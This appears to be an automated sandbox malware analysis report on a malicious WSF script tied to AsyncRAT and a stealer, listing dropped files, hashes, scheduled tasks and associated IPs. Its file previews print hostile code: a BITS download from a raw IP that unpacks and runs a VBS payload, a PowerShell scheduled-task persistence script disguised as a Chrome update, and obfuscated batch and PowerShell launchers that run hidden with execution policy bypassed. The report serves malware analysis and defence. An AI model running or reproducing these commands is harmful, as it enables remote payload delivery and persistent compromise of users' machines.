                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:40
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:Summaryform_FXnbLLyKOJ.wsf
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.expl.evad.winWSF@60/30@1/3
                                        EGA Information:
                                        • Successful, ratio: 33.3%
                                        HCA Information:
                                        • Successful, ratio: 96%
                                        • Number of executed functions: 268
                                        • Number of non-executed functions: 7
                                        Cookbook Comments:
                                        • Found application associated with file extension: .wsf
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target RegSvcs.exe, PID 3728 because it is empty
                                        • Execution Graph export aborted for target RegSvcs.exe, PID 5040 because it is empty
                                        • Execution Graph export aborted for target powershell.exe, PID 4156 because it is empty
                                        • Execution Graph export aborted for target powershell.exe, PID 5024 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtCreateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                        • VT rate limit hit for: Summaryform_FXnbLLyKOJ.wsf

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        16:34:47API Interceptor139x Sleep call for process: powershell.exe modified
                                        16:34:49API Interceptor3x Sleep call for process: svchost.exe modified
                                        16:35:02Task SchedulerRun new task: ChromeUpdateV1 path: C:\Users\Public\NewRdpFirstTry.vbs
                                        16:35:50API Interceptor5714829x Sleep call for process: RegSvcs.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        212.23.222.200Summaryform_TgQFBSAqdC.zipGet hashmaliciousAsyncRAT, PureLog StealerBrowse

                                          Domains

                                          No context

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          RELIABLESITEUSjeNQRsRgBe.exeGet hashmaliciousXmrigBrowse
                                          • 104.243.33.118
                                          9c5R75OCTH.rtfGet hashmaliciousRemcosBrowse
                                          • 103.195.103.144
                                          RdoOvVK8rA.rtfGet hashmaliciousRemcosBrowse
                                          • 103.195.103.144
                                          171033906768c171078005bd5679bcd7a81d40e80cc76f6a0ef5dc60c10b477d48eab4c9d3438.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                          • 103.195.103.144
                                          ORDER_SPECIFICATIONS_OFFER.xla.xlsxGet hashmaliciousRemcosBrowse
                                          • 103.195.103.144
                                          Product-specifications.xla.xlsxGet hashmaliciousRemcosBrowse
                                          • 103.195.103.144
                                          PO4029530.xla.xlsxGet hashmaliciousRemcosBrowse
                                          • 103.195.103.144
                                          https://hmyoffice365oth-47f8.guzelkiz66.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                          • 104.194.8.143
                                          https://fayetteiowa.com/media/media/js/fxzdfsd.htmlGet hashmaliciousHTMLPhisherBrowse
                                          • 104.194.8.143
                                          AWB_008765499.exeGet hashmaliciousAgentTeslaBrowse
                                          • 104.194.10.93
                                          TMRDESummaryform_TgQFBSAqdC.zipGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                          • 212.23.222.200
                                          2C8CDA2CCC942B4EDA8E1EE37A8F68C557FEE80E14244.exeGet hashmaliciousQuasarBrowse
                                          • 212.23.222.42
                                          Hilix.mips.elfGet hashmaliciousMiraiBrowse
                                          • 185.245.176.189
                                          BiU282bjyR.exeGet hashmaliciousRemcosBrowse
                                          • 212.23.211.238
                                          https://ipfs.io/ipfs/QmdTwDBzfv7vcTnw34YZhB4VroSotz2NY5Hc5FzzQX8qxQ#rramis@isciii.esGet hashmaliciousHTMLPhisherBrowse
                                          • 212.23.144.169
                                          wx7x7YkSI8.elfGet hashmaliciousUnknownBrowse
                                          • 185.249.170.212
                                          2DLd2J82an.elfGet hashmaliciousMiraiBrowse
                                          • 212.23.154.151
                                          5vFyCZCGL7.elfGet hashmaliciousUnknownBrowse
                                          • 212.23.212.254
                                          Remittance_ACH_20220630.HTMLGet hashmaliciousUnknownBrowse
                                          • 212.23.201.50
                                          JIzNxwvQm7.dllGet hashmaliciousWannacryBrowse
                                          • 212.23.152.51

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                          Download File
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):8192
                                          Entropy (8bit):0.35999246155449205
                                          Encrypted:false
                                          SSDEEP:6:6xNoaaD0JOCEfMuaaD0JOCEfMKQmDmxNoaaD0JOCEfMuaaD0JOCEfMKQmD:HaaD0JcaaD0JwQQzaaD0JcaaD0JwQQ
                                          MD5:247B919FE91944A8F0F42F4D079F6E1E
                                          SHA1:697E2C22AC489E20FC5D3809A5552CC2DB30C0C1
                                          SHA-256:57D0A4F0C75E0516F650A83A1C4CA590CEF68985B639B48F8924487287088387
                                          SHA-512:C1FB72FDBBDFBAF9D487B2E9069BCD20286588EA21B6118CB6076C7B3F826F46D97431463BF1D42C23E30BD6055644FEDE46997162F7349DCA99C8594E1A48C3
                                          Malicious:false
                                          Preview:*.>...........p.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................p.............................................................................................................................................................................................................................................................................................................................................................

                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                          Download File
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1310720
                                          Entropy (8bit):0.7522399913515765
                                          Encrypted:false
                                          SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0v:9JZj5MiKNnNhoxuU
                                          MD5:31182EA8661656FBC070E62F2C8F59D4
                                          SHA1:9318229C16D25E880158C0AF2C69C1DDE2CB728C
                                          SHA-256:8C003FA06B286E88640B409F1B6CA4F3A27F3ABAAED77DB32D82AE88DD1EBA9F
                                          SHA-512:65209416C6C17250A6FCFC678D8CFE18EED3AD0BB984A7449EB4A4C2E55468EC13C39AECC1E7956D5886358F413021770D7D7C7E99048DCEE1A5751BFA5B16A0
                                          Malicious:false
                                          Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                          Download File
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:Extensible storage user DataBase, version 0x620, checksum 0xeb5681b6, page size 16384, Windows version 10.0
                                          Category:dropped
                                          Size (bytes):1310720
                                          Entropy (8bit):0.629302318267076
                                          Encrypted:false
                                          SSDEEP:1536:1SB2ESB2SSjlK/3xH03N9J9N8sYkr3g16b2UPkLk+kDWyrufTRryrCOLUzCJ:1azal6BiU2UdmOOOL
                                          MD5:9791D3CCA91C7DDB4EF181C358D5697A
                                          SHA1:7D08B783B490284F222C87BEDE3CF0AC27AD5F1D
                                          SHA-256:67EC392483C649829FA9B753987BC25A9274AB1DBCA7DF87FDE8D7005E245287
                                          SHA-512:301C6ABDE60B767FFA96560445DF32025FC575C5A7222AC60B8B4A30538DD1D39637A562A021BB29E08047C0AE0C5550E5C24203BDA043AFEBD85A00018B3C75
                                          Malicious:false
                                          Preview:.V..... .......g.......X\...;...{......................0.o......%...|..1"...|a.h.g......%...|..0.o.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{....................................j..%...|..................d.=..%...|...........................#......0.o.....................................................................................................................................................................................................................................................................................................................................................

                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                          Download File
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):16384
                                          Entropy (8bit):0.07958383486632692
                                          Encrypted:false
                                          SSDEEP:3:l8mllllUetYejgmwllJ9Aqpw3mZill3YpllAllwQXulZMPCyH:RXNzjcJiP3joRAWQA
                                          MD5:36EFC517829C87C54FE90FC0E45D063E
                                          SHA1:CB60139984904632871EC4FA36F040A2FC541B02
                                          SHA-256:9C3035C8F17DA18828FD42C942D2745E629DD4C5FC16259ADB903A4D4142D0FE
                                          SHA-512:EE840D35EB60E58C7917ADF355F0B2AD4B3EC8C3683BCD77580F5DD9ABCC1971ED890ECE64682E787148CF9DEBF323888F2B35374DACABB8E274D4800EA71A83
                                          Malicious:false
                                          Preview:<S.......................................;...{..1"...|...%...|...........%...|o..%...|...M...%...|..................d.=..%...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\Public\BIT87CA.tmp

                                          Download File
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                          Category:dropped
                                          Size (bytes):97157
                                          Entropy (8bit):7.996245860465221
                                          Encrypted:true
                                          SSDEEP:1536:WvLxlkAiGJQSAapWyjbp/CfvcSZ6MiEdazBBzX+RxnekeQC2mg+7qUTSe8oOnJhQ:m5RuSl/tCfvX6MTda3zXgxnekeQ9mjWU
                                          MD5:2E650D8ACA0CE25F097EC0393F5635EA
                                          SHA1:048ECA71EF4C5034F6B445C23A59724579D89A13
                                          SHA-256:D8E58AD8AAEFAEB36168A5DF9BDBD812E0D614ECA924DD1DAD25C38C9D975241
                                          SHA-512:30B5F1D1C9F5D4E8E111F9AE5A8C1FC13DBC9F5583C6136D1B656406F5516F5513C3E26DE202DB61C85CD66A1B29141F3AC08F91D974D1E5F9D72BFF7DA7AFE0
                                          Malicious:false
                                          Preview:PK.........qfXi.D.....U.......TextCZvTbYMEYspgaPVo.vbs..;o.@.....?....!.H)...c...8........0.>.X)0M...o..Rb2.0...5..z..{Y.|.....e...rR/..co.g.;....&5l......`..v.F.=.B.q.....8.1.@<$...A,.M~ .+....l...PU..........7t...\.}.:.s.l...0..|IWs'..*...1{...*$,...........:..J1".M].4.h.\.......S&U.Ft..p.xoI]yv.hI,...C..T.![.^..]....2...j..PK........`qfXP.+[f...........DnWEdFPemZvdtKRs.ps1]Q.n.0../........}.w0.u..6..4...q..R@.........B.q...?.. ......ohXLK....-...h.H...l>.......V...Q.....b...m...5h....l.;.J.c.......q=.e...0..|rjc!.b......*V...{T..(...RD.'..5...$Y"(..f..2..}..(..,dk..WQ....}.......t..j]...]W.ec....M\R.] qT6n..o.q.a?.xhb./....K.X_.......~cM...... q..<n.D.F._....y.NL.....W....*.....>.:..w.]E:W.o......M~.PK.........qfX..?.....X.......NewRdpFirstTry.vbs.R.o.0..7..h8....KvX..........C;....._.*f..e.~...#.E.{Bp.7 ...5|+.-...Q..K".u...?...{..Kh"R....U+....lNm...../..h$X.....B)..G=q......*5.?.J.r..4..4z...p._/.>Y.No"Z.fZ_...3{2.i.l:63..x1..@{.5.........

                                          C:\Users\Public\DnWEdFPemZvdtKRs.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):539
                                          Entropy (8bit):5.267485980858452
                                          Encrypted:false
                                          SSDEEP:12:JMCEimooM5BpWYpShOF47BGBKyzOVrERURXf5N:JMCEroDbWqM+47Y0siERURXn
                                          MD5:79A5AFE9C89440CBD58345092932B500
                                          SHA1:0C19CE90D3190D9F1239772CE5DC78BEB2150742
                                          SHA-256:41EDEA87438533FDC222EBB65E318D72E0C81B077904583C678772DAA49F8396
                                          SHA-512:1932020312CD7451571900EEDD70DA3DEA5FBB42E8E9F3EED5AEF184B4B366A5A29763A299406655174A038828916C1455800331AC1EBDEA7BD7C59820DF539E
                                          Malicious:true
                                          Preview:..$gy = New-Object -ComObject Schedule.Service..$gy.Connect()..$td = $gy.NewTask(0)..$td.RegistrationInfo.Description = "Runs a script every 2 minutes"..$td.Settings.Enabled = $true..$td.Settings.DisallowStartIfOnBatteries = $false..$st = $td.Triggers.Create(1)..$st.StartBoundary = [DateTime]::Now.ToString("yyyy-MM-ddTHH:mm:ss")..$st.Repetition.Interval = "PT2M"..$yk = $td.Actions.Create(0)..$yk.Path = "C:\Users\Public\NewRdpFirstTry.vbs"..$ns = $gy.GetFolder("\")..$ns.RegisterTaskDefinition("ChromeUpdateV1", $td, 6, $null, $null, 3)

                                          C:\Users\Public\NDKJPlEEYLhKqtGW.xml

                                          Download File
                                          Process:C:\Windows\System32\wscript.exe
                                          File Type:ASCII text, with very long lines (419), with no line terminators
                                          Category:dropped
                                          Size (bytes):419
                                          Entropy (8bit):5.370441018124353
                                          Encrypted:false
                                          SSDEEP:6:V44GAHtSlRAyqbvLZjVIaHY3H94aHY3lIWQuoaHb/WSaHtv3QaHY3lIzbACHkt:vGA0LRELRVSNCCprvKCgCHkt
                                          MD5:2AEAA5E8ADDDEB8F95DE2B7593F4FBC4
                                          SHA1:40215438840423FC80EB2A76D48E839325E37450
                                          SHA-256:3B2EB8B2EC16AEF984E704528FE0800B24A46B75BE15B76F3B4908175D8517E0
                                          SHA-512:D9EA078A5898E7D7E834D9BFDE8D0C3FA3F91D218798DFA7AE348947155B1CC9F93900C15D7DE4AE690D3168DDF856947BBE1D912567A087D82968C371FDA5C5
                                          Malicious:true
                                          Preview:<command> <a> <execute>Start-BitsTransfer -Source "http://212.23.222.200:222/DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg" -Destination "C:\Users\Public\sNGobbjhXGKsSanr.zip"; Expand-Archive -Path "C:\Users\Public\sNGobbjhXGKsSanr.zip" -DestinationPath "C:\Users\Public\" -Force; Start "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs"; Remove-Item -Path "C:\Users\Public\sNGobbjhXGKsSanr.zip" -Force</execute> </a></command>

                                          C:\Users\Public\NewRdpFirstTry.vbs

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):600
                                          Entropy (8bit):5.5072797492944545
                                          Encrypted:false
                                          SSDEEP:12:9vWd+BUhc0l/3s/zOhbohD4j+94jkUSD/nhT4jKG3k/CezMmR/migIHybxETmuoO:9A+j0l/sLXR4jm4jkUOV4j103g0/5gIX
                                          MD5:7417E9A0529ACDC4025222B406DE0168
                                          SHA1:7E297D2872E8EAD3DE3AF8941ED5FF35E57D5D90
                                          SHA-256:5529CE28BAC56A21F4935413D03E6C0C2B77AE255F5F4866D39A4C85112F0623
                                          SHA-512:473D3377B037A178A43E6EDE28C1AC8D18B4DA23A9666D11DDBCBB28051633E4BC250BE7560D9C2FCD46D2565E9ED5AA483E52F74D0A72F223BCEE6C1FD5B91C
                                          Malicious:false
                                          Preview:On Error Resume Next..Dim POcIzDdrENqLTqyM..Dim UvrnJvuQiQrSGZeQ..Dim tMnTSUGklmqaOoOq..UvrnJvuQiQrSGZeQ = False..tMnTSUGklmqaOoOq = 0..Set POcIzDdrENqLTqyM = CreateObject("WScript.Shell")..Dim GtnfewUAwpvQDPJt..GtnfewUAwpvQDPJt = "net session"..tMnTSUGklmqaOoOq = POcIzDdrENqLTqyM.Run(GtnfewUAwpvQDPJt, 0, True)..If tMnTSUGklmqaOoOq = 0 Then..UvrnJvuQiQrSGZeQ = True..End If..Dim IedzXnzCXUJNgIdp..IedzXnzCXUJNgIdp = "C:\Users\Public\solankedoubledigits.bat"..If UvrnJvuQiQrSGZeQ Then..POcIzDdrENqLTqyM.Run IedzXnzCXUJNgIdp, 0..Else..POcIzDdrENqLTqyM.Run IedzXnzCXUJNgIdp, 0..End If..On Error GoTo 0

                                          C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):597
                                          Entropy (8bit):5.521420590233325
                                          Encrypted:false
                                          SSDEEP:12:9vWd+lQ1aSFh7V+1Ygfh3SQ1+pGZ8s71m7/DcQ+g+JEXtn:9A+KNFh4ugf9hAlXtn
                                          MD5:470FDA0614F493069AE7266AD5964988
                                          SHA1:0C72577D0CA9B1A04D6F3A455A52AD7C637BF5CE
                                          SHA-256:5FDB91369B61934E3B98B1963D486E81E0BAE91732653AE788F2E3CFCEC32AF2
                                          SHA-512:9AB081081C423BCA9AAE6207CBAF7AFE98B7A14681BA52611C8039F598E70BB6D590FE6D69BFBF6D7E7FF62C11F2BC6D9FEE6CFAC1983D5470D6A0D19D436C00
                                          Malicious:true
                                          Preview:On Error Resume Next..Dim fzQtuuvLreyHTMFi..Dim ypgJLGOqRvUtEMVv..Dim TpOaAoxqizGhneKC..ypgJLGOqRvUtEMVv = False..TpOaAoxqizGhneKC = 0..Set fzQtuuvLreyHTMFi = CreateObject("WScript.Shell")..Dim yXWFdhzWSRMQzvzE..yXWFdhzWSRMQzvzE = "net session"..TpOaAoxqizGhneKC = fzQtuuvLreyHTMFi.Run(yXWFdhzWSRMQzvzE, 0, True)..If TpOaAoxqizGhneKC = 0 Then..ypgJLGOqRvUtEMVv = True..End If..Dim executionCommand..executionCommand = "C:\Users\Public\nKNmegHQBbmlQMTN.bat"..If ypgJLGOqRvUtEMVv Then..fzQtuuvLreyHTMFi.Run executionCommand, 0..Else..fzQtuuvLreyHTMFi.Run executionCommand, 0..End If..On Error GoTo 0

                                          C:\Users\Public\nKNmegHQBbmlQMTN.bat

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:DOS batch file, ASCII text, with very long lines (485), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1259
                                          Entropy (8bit):5.78080544816613
                                          Encrypted:false
                                          SSDEEP:24:w7eb0+JMbqx+xIW3yvH9m2jcR8/5t99jJ9QIdUzOoKBWz1ru+b3tSL2MMV8jNL2k:4oCIX/sOoi2JVONCibuiv
                                          MD5:5EE9F48E1ECD11980E83AC7DB8DD16B2
                                          SHA1:552EC8D7B06504A67A7EBDE55F23F556475DB5C1
                                          SHA-256:026079EED694508E0DEAE4F5560AB46B46E9ED79C6EC94F02D13937583A518C0
                                          SHA-512:A0598E6B13036F0AF783668A132AF1B881B377FD54471E3A1B46FB40BCD519FB3B710CC71D60B01EA4022B07EF3E3476823CC00616EF98389179782465A89680
                                          Malicious:true
                                          Preview:@echo off..set "LNpEAwTiHOOLLLrB=po"..set "YafFCSsbOmsVVMcj=wer"..set "ygcfKAKtALtPrOLA=sh"..set "kbMCRcqGTevnpAfZ=el"..set "nprRbzyhXriNhUSO=l."..set "hFFWmbkIUQSJNAoU=e"..set "ZxFcpyvWEjxDtRQR=xe"..set "kbLUiQnqErvDmuNI=-No"..set "poPaKWmgQgxySiXP=Pro"..set "vOPzKBTPyYgZlOCx=fi"..set "OSxFpTYSByGZQBdg=le "..set "AfYibbFoSzpiqLea=-Win"..set "RZLPZdfBMRzvqMlK=dowS"..set "tEEPdvJJpNgSDELD=tyl"..set "VXxBIyHtEnQYzqKO=e Hi"..set "FoAwzhmrfdVTbVcl=dden "..set "IIpOFglltilVGqbC=-Executi"..set "VpkSemHTtacNsHQu=onPolicy By"..set "AqRWaXQArfVpMZuI=pass"..set "wPOTtCZGbYQqNYYs=C:\"..set "rTbcWVEVfoIQEaZc=Users\"..set "PajnFQSKjJKROSNT=Public\"..set "WWoMOruRnohAlDmC=DnWEdFPemZvdtKRs"..set "NftPNaMbrKZOGoQj=.p"..set "IjYwIhwPmGChEPoZ=s"..set "GPUHaCFnFHHzpzFz=1"..%LNpEAwTiHOOLLLrB%%YafFCSsbOmsVVMcj%%ygcfKAKtALtPrOLA%%kbMCRcqGTevnpAfZ%%nprRbzyhXriNhUSO%%hFFWmbkIUQSJNAoU%%ZxFcpyvWEjxDtRQR% %kbLUiQnqErvDmuNI%%poPaKWmgQgxySiXP%%vOPzKBTPyYgZlOCx%%OSxFpTYSByGZQBdg%%AfYibbFoSzpiqLea%%RZLPZdfBMRzvqMlK%

                                          C:\Users\Public\newrdptry.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with very long lines (64034), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):576457
                                          Entropy (8bit):3.6036865653568295
                                          Encrypted:false
                                          SSDEEP:1536:kDh8DyXBs84VhDEak0EyxWq0Anddy1chWIep:kDhiyXBs84VhDEakbyxWq0Aby1x
                                          MD5:4F74CF98CE587C712925BBE3640C1B47
                                          SHA1:E89E045477B89F0D19D3A316B97B8B0F6EF76DB6
                                          SHA-256:6163A74D83367AED9E85A8B660CF9373A2181161228DCB98457D29FF6975D4D0
                                          SHA-512:ED4B0247A7F8E983A3002D9647E7526DB5E420E73A56839F61944D188DEEE1DF5C1437672CAE25B96458B30931F632FF82D6082DE7C1B89FEB2F3CBD58023221
                                          Malicious:true
                                          Preview:.("{3}{2}{1}{0}"-f'e','aRiabL','t-V','Se') ("{0}{1}"-f'Nyu','B2') ( [TypE]("{1}{0}{2}"-F 'R','CoNVE','t')); try {.. .. function P`ARSer { .. param (${pI`pE}) .("{3}{0}{1}{2}"-f'et-Vari','ab','le','S') -Name ("{0}{1}" -f 'pip','e') -Value (${P`iPE} -split ' ' | &('?') {${_}}) .. foreach(${cHU`Nk} in ${P`IpE} ){ .. ${N`YU`B2}::("{0}{1}{2}"-f 'T','oInt3','2').Invoke(${C`huNK} , 16) .. }

                                          C:\Users\Public\sNGobbjhXGKsSanr.zip (copy)

                                          Download File
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                          Category:dropped
                                          Size (bytes):97157
                                          Entropy (8bit):7.996245860465221
                                          Encrypted:true
                                          SSDEEP:1536:WvLxlkAiGJQSAapWyjbp/CfvcSZ6MiEdazBBzX+RxnekeQC2mg+7qUTSe8oOnJhQ:m5RuSl/tCfvX6MTda3zXgxnekeQ9mjWU
                                          MD5:2E650D8ACA0CE25F097EC0393F5635EA
                                          SHA1:048ECA71EF4C5034F6B445C23A59724579D89A13
                                          SHA-256:D8E58AD8AAEFAEB36168A5DF9BDBD812E0D614ECA924DD1DAD25C38C9D975241
                                          SHA-512:30B5F1D1C9F5D4E8E111F9AE5A8C1FC13DBC9F5583C6136D1B656406F5516F5513C3E26DE202DB61C85CD66A1B29141F3AC08F91D974D1E5F9D72BFF7DA7AFE0
                                          Malicious:false
                                          Preview:PK.........qfXi.D.....U.......TextCZvTbYMEYspgaPVo.vbs..;o.@.....?....!.H)...c...8........0.>.X)0M...o..Rb2.0...5..z..{Y.|.....e...rR/..co.g.;....&5l......`..v.F.=.B.q.....8.1.@<$...A,.M~ .+....l...PU..........7t...\.}.:.s.l...0..|IWs'..*...1{...*$,...........:..J1".M].4.h.\.......S&U.Ft..p.xoI]yv.hI,...C..T.![.^..]....2...j..PK........`qfXP.+[f...........DnWEdFPemZvdtKRs.ps1]Q.n.0../........}.w0.u..6..4...q..R@.........B.q...?.. ......ohXLK....-...h.H...l>.......V...Q.....b...m...5h....l.;.J.c.......q=.e...0..|rjc!.b......*V...{T..(...RD.'..5...$Y"(..f..2..}..(..,dk..WQ....}.......t..j]...]W.ec....M\R.] qT6n..o.q.a?.xhb./....K.X_.......~cM...... q..<n.D.F._....y.NL.....W....*.....>.:..w.]E:W.o......M~.PK.........qfX..?.....X.......NewRdpFirstTry.vbs.R.o.0..7..h8....KvX..........C;....._.*f..e.~...#.E.{Bp.7 ...5|+.-...Q..K".u...?...{..Kh"R....U+....lNm...../..h$X.....B)..G=q......*5.?.J.r..4..4z...p._/.>Y.No"Z.fZ_...3{2.i.l:63..x1..@{.5.........

                                          C:\Users\Public\solankedoubledigits.bat

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:DOS batch file, ASCII text, with very long lines (485), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1252
                                          Entropy (8bit):5.744078494228679
                                          Encrypted:false
                                          SSDEEP:24:w7ajsJYRAE0QW7qR96a9GRmog+F7GPw9L6BhWL9nu01IELkzEfRh0QbI8wJAhpvd:SJYLW+N+JsBbL01nHoQmJA5BnLKfqMq7
                                          MD5:E79645F9F7871C9CD9966F13FE52144D
                                          SHA1:861252AFC962E91E35AEB93AE45739C85EC77A7F
                                          SHA-256:C676A4EF5AE7F4A616BBA72E775CDBDCB5E43A52E3B4632F416EB32E0190FBF8
                                          SHA-512:D360AD3ABCAFC71842FE83F523A75E991BB167CD702381364D62DE73C63701451E732760857C1533EBA4D5460DC030E0C113AD051E06D8B9E604ED5F75AA3E97
                                          Malicious:true
                                          Preview:@echo off..set "UsWfRAADdVaFQEyw=po"..set "QaIaodDZVsFyBElX=wer"..set "QVqQwTpJZJrNJzel=sh"..set "kUgBFvSkUeZZXfiR=el"..set "KAUqnDyyfaIPRgYw=l."..set "jcMtarsoXGggZZbX=e"..set "ltMPkwzQYnxdYHxe=xe"..set "vmQqccWBgODIXlzL=-No"..set "aFEgpxHjZFhuAIGJ=Pro"..set "waqUAEoDTlPFRHTJ=fi"..set "TlJNZtuehUfELOZm=le "..set "wVfhhdSPwrZyaQpy=-Win"..set "OskvyWciLINNObFF=dowS"..set "BzkasbKEsFzzEFKN=tyl"..set "UsqoeJAbumgiOeIH=e Hi"..set "siwACoQXsybYiGOU=dden "..set "licOwlUUGBqnNgtR=-Executi"..set "fpfEeTUhTghHCTEh=onPolicy By"..set "LUTQDClXAeLsDSfE=pass"..set "ffPsTMIVAzjpyNlw=C:\"..set "MRzCBkqADmcAevIE=Users\"..set "ZrIFHLDygptGzkrC=Public\"..set "cURPApZfndOqQOTN=newrdptry"..set "oROZNjdjYlNSWKjT=.p"..set "VqKVeNfuCOqiNzHX=s"..set "deHSkHSZVHAUxlSF=1"..%UsWfRAADdVaFQEyw%%QaIaodDZVsFyBElX%%QVqQwTpJZJrNJzel%%kUgBFvSkUeZZXfiR%%KAUqnDyyfaIPRgYw%%jcMtarsoXGggZZbX%%ltMPkwzQYnxdYHxe% %vmQqccWBgODIXlzL%%aFEgpxHjZFhuAIGJ%%waqUAEoDTlPFRHTJ%%TlJNZtuehUfELOZm%%wVfhhdSPwrZyaQpy%%OskvyWciLINNObFF%%Bzkasb

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

                                          Download File
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          File Type:CSV text
                                          Category:dropped
                                          Size (bytes):425
                                          Entropy (8bit):5.353683843266035
                                          Encrypted:false
                                          SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                          MD5:859802284B12C59DDBB85B0AC64C08F0
                                          SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                          SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                          SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                          Malicious:false
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\sExygfKkJDoIUpeo[1].txt

                                          Download File
                                          Process:C:\Windows\System32\wscript.exe
                                          File Type:ASCII text, with very long lines (414), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1079
                                          Entropy (8bit):5.670323832701884
                                          Encrypted:false
                                          SSDEEP:24:wV+hEJ6vvVroW3f7gYKYUIMdx0SSIc9dApMn:w+E03yCr5mWPIcXApM
                                          MD5:565EA07FD069AF9D5778A0010C2B18FF
                                          SHA1:0B73FF4F2D03A1D70B8A02CB72F2A28756E05873
